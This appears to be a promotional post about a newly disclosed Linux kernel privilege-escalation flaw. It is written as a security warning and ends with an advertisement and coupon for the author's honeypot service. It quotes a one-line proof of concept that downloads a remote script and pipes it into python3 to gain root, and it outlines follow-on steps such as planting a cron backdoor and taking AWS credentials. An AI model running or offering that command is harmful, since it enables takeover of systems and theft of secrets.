Disclosure dropped this week at copy.fail. Logic flaw in the kernel's authencesn, reachable via AF_ALG, abused through splice() to write 4 bytes into the page cache of any setuid binary. 732 bytes of stdlib Python. No race, no offsets, reliable on every affected distro since 2017.

PoC:

curl https://copy.fail/exp | python3 && su

Distros are patching. Fine.

The bit nobody talks about: it's a local priv esc. The attacker still needs a shell first.

That shell doesn't come from your hardened SSH. It comes from the WordPress plugin you forgot was installed. The Grafana on :3000. The Jenkins your CI team spun up two years ago. The leaked GitHub PAT in a public gist. The n-day on your firewall vendor that everyone is still patching.

They land as www-data. They run the 732-byte one-liner. They're root. Backdoor in /etc/cron.d/. known_hosts dumped. AWS keys pulled from ~/.aws/credentials. Your Ansible inventory is now their target list. Friday they're inside. Sunday they push. Monday your /home is on a leak site and you're explaining to legal why prod creds lived on a Jenkins worker.

I run a honeypot (TarPit.pro, full disclosure). Across 5 of my own boxes in the last 20 days:

• ~40k attack attempts
• ~14k unique IPs
• ~5k auto banned
• Top ports: SSH (14k), Telnet (3.2k), SMB (2.2k)

Those are the IPs you collected the last few months that, today, will be running curl copy.fail/exp | python3 on whichever box they land on first.

Patch the kernel. Then close the on-ramp. Single Go binary, free tier on 2 servers, no Docker. Coupon LAUNCH101 makes Starter and Pro free for 2 months if you want it on more